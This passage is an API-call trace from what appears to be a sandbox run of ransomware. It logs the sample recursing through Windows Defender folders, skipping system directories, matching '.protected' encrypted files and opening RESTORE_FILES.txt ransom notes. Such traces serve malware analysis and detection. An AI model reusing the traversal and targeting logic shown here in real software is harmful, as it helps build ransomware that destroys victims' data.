pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\..") returned 58 [0093.274] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.274] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.274] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.274] lstrcmpiW (lpString1="History", lpString2="Windows") returned -1 [0093.274] lstrcmpiW (lpString1="History", lpString2="Program Files") returned -1 [0093.274] lstrcmpiW (lpString1="History", lpString2="Program Files (x86)") returned -1 [0093.274] lstrcmpiW (lpString1="History", lpString2="$Recycle.bin") returned 1 [0093.274] lstrcmpiW (lpString1="History", lpString2="System Volume Information") returned -1 [0093.274] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History") returned 63 [0093.274] lstrcmpW (lpString1="History", lpString2=".") returned 1 [0093.274] lstrcmpW (lpString1="History", lpString2="..") returned 1 [0093.274] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*") returned 65 [0093.274] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.275] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.275] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.275] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.275] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.275] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.275] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\.") returned 65 [0093.275] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.275] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.275] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.275] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.275] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.275] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.275] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.275] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\..") returned 66 [0093.275] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.275] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.275] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.275] lstrcmpiW (lpString1="CacheManager", lpString2="Windows") returned -1 [0093.275] lstrcmpiW (lpString1="CacheManager", lpString2="Program Files") returned -1 [0093.275] lstrcmpiW (lpString1="CacheManager", lpString2="Program Files (x86)") returned -1 [0093.275] lstrcmpiW (lpString1="CacheManager", lpString2="$Recycle.bin") returned 1 [0093.275] lstrcmpiW (lpString1="CacheManager", lpString2="System Volume Information") returned -1 [0093.275] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned 76 [0093.275] lstrcmpW (lpString1="CacheManager", lpString2=".") returned 1 [0093.275] lstrcmpW (lpString1="CacheManager", lpString2="..") returned 1 [0093.275] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*") returned 78 [0093.275] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.276] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.276] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.276] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.276] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\.") returned 78 [0093.276] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.276] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.276] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\..") returned 79 [0093.276] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.276] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.276] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.276] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.protected") returned 96 [0093.276] StrStrIW (lpFirst="MpSfc.bin.protected", lpSrch=".protected") returned=".protected" [0093.276] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.276] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\RESTORE_FILES.txt") returned 94 [0093.276] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.276] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.276] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.276] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.276] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\RESTORE_FILES.txt") returned 94 [0093.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\cachemanager\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.276] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.276] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.276] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.276] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.276] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.276] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.276] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RESTORE_FILES.txt") returned 81 [0093.276] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.276] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.276] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.276] lstrcmpiW (lpString1="Results", lpString2="Windows") returned -1 [0093.276] lstrcmpiW (lpString1="Results", lpString2="Program Files") returned 1 [0093.276] lstrcmpiW (lpString1="Results", lpString2="Program Files (x86)") returned 1 [0093.276] lstrcmpiW (lpString1="Results", lpString2="$Recycle.bin") returned 1 [0093.277] lstrcmpiW (lpString1="Results", lpString2="System Volume Information") returned -1 [0093.277] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned 71 [0093.277] lstrcmpW (lpString1="Results", lpString2=".") returned 1 [0093.277] lstrcmpW (lpString1="Results", lpString2="..") returned 1 [0093.277] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*") returned 73 [0093.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.277] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.277] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.277] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.277] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.277] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.277] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\.") returned 73 [0093.277] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.277] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.277] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.277] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.277] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.277] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.277] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.277] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\..") returned 74 [0093.277] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.277] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.277] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.277] lstrcmpiW (lpString1="Resource", lpString2="Windows") returned -1 [0093.277] lstrcmpiW (lpString1="Resource", lpString2="Program Files") returned 1 [0093.277] lstrcmpiW (lpString1="Resource", lpString2="Program Files (x86)") returned 1 [0093.277] lstrcmpiW (lpString1="Resource", lpString2="$Recycle.bin") returned 1 [0093.277] lstrcmpiW (lpString1="Resource", lpString2="System Volume Information") returned -1 [0093.277] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource") returned 80 [0093.277] lstrcmpW (lpString1="Resource", lpString2=".") returned 1 [0093.277] lstrcmpW (lpString1="Resource", lpString2="..") returned 1 [0093.278] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*") returned 82 [0093.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0093.278] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.278] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.278] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.278] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.278] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.278] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\.") returned 82 [0093.278] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.278] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0093.278] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.278] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.278] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.278] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.278] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.278] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\..") returned 83 [0093.278] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.278] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.278] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0093.278] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.278] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.278] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.278] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.278] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.278] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\RESTORE_FILES.txt") returned 98 [0093.278] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.278] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.278] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0093.278] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected", lpString2="Windows") returned -1 [0093.278] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected", lpString2="Program Files") returned -1 [0093.278] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected", lpString2="Program Files (x86)") returned -1 [0093.279] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected", lpString2="$Recycle.bin") returned 1 [0093.279] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected", lpString2="System Volume Information") returned -1 [0093.279] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected") returned 129 [0093.279] StrStrIW (lpFirst="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected", lpSrch=".protected") returned=".protected" [0093.279] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0093.279] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0093.279] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\RESTORE_FILES.txt") returned 98 [0093.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\results\\resource\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.279] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.279] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.279] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.279] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.279] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.279] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.279] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\RESTORE_FILES.txt") returned 89 [0093.279] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.279] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.279] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.279] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.279] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\RESTORE_FILES.txt") returned 89 [0093.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\results\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.280] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.280] lstrcmpiW (lpString1="Service", lpString2="Windows") returned -1 [0093.280] lstrcmpiW (lpString1="Service", lpString2="Program Files") returned 1 [0093.280] lstrcmpiW (lpString1="Service", lpString2="Program Files (x86)") returned 1 [0093.280] lstrcmpiW (lpString1="Service", lpString2="$Recycle.bin") returned 1 [0093.280] lstrcmpiW (lpString1="Service", lpString2="System Volume Information") returned -1 [0093.280] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned 71 [0093.280] lstrcmpW (lpString1="Service", lpString2=".") returned 1 [0093.280] lstrcmpW (lpString1="Service", lpString2="..") returned 1 [0093.280] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*") returned 73 [0093.280] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.280] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.280] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.280] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.280] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.280] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.280] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\.") returned 73 [0093.280] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.281] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.281] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.281] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.281] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.281] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.281] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.281] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\..") returned 74 [0093.281] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.281] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.281] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.281] lstrcmpiW (lpString1="History.Log.protected", lpString2="Windows") returned -1 [0093.281] lstrcmpiW (lpString1="History.Log.protected", lpString2="Program Files") returned -1 [0093.281] lstrcmpiW (lpString1="History.Log.protected", lpString2="Program Files (x86)") returned -1 [0093.281] lstrcmpiW (lpString1="History.Log.protected", lpString2="$Recycle.bin") returned 1 [0093.281] lstrcmpiW (lpString1="History.Log.protected", lpString2="System Volume Information") returned -1 [0093.281] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log.protected") returned 93 [0093.281] StrStrIW (lpFirst="History.Log.protected", lpSrch=".protected") returned=".protected" [0093.281] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.281] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.281] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.281] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.281] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.281] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.281] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\RESTORE_FILES.txt") returned 89 [0093.281] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.281] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.281] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.281] lstrcmpiW (lpString1="Unknown.Log.protected", lpString2="Windows") returned -1 [0093.281] lstrcmpiW (lpString1="Unknown.Log.protected", lpString2="Program Files") returned 1 [0093.281] lstrcmpiW (lpString1="Unknown.Log.protected", lpString2="Program Files (x86)") returned 1 [0093.281] lstrcmpiW (lpString1="Unknown.Log.protected", lpString2="$Recycle.bin") returned 1 [0093.281] lstrcmpiW (lpString1="Unknown.Log.protected", lpString2="System Volume Information") returned 1 [0093.281] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log.protected") returned 93 [0093.281] StrStrIW (lpFirst="Unknown.Log.protected", lpSrch=".protected") returned=".protected" [0093.281] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.281] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.281] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\RESTORE_FILES.txt") returned 89 [0093.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\service\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.282] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.282] lstrcmpiW (lpString1="Store", lpString2="Windows") returned -1 [0093.282] lstrcmpiW (lpString1="Store", lpString2="Program Files") returned 1 [0093.282] lstrcmpiW (lpString1="Store", lpString2="Program Files (x86)") returned 1 [0093.282] lstrcmpiW (lpString1="Store", lpString2="$Recycle.bin") returned 1 [0093.282] lstrcmpiW (lpString1="Store", lpString2="System Volume Information") returned -1 [0093.282] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned 69 [0093.282] lstrcmpW (lpString1="Store", lpString2=".") returned 1 [0093.282] lstrcmpW (lpString1="Store", lpString2="..") returned 1 [0093.282] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*") returned 71 [0093.282] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.282] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.282] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.282] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.282] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.282] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.282] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\.") returned 71 [0093.282] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.282] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.282] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.282] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.282] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.282] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.282] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.282] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\..") returned 72 [0093.282] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.282] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.282] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.282] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.282] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.282] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 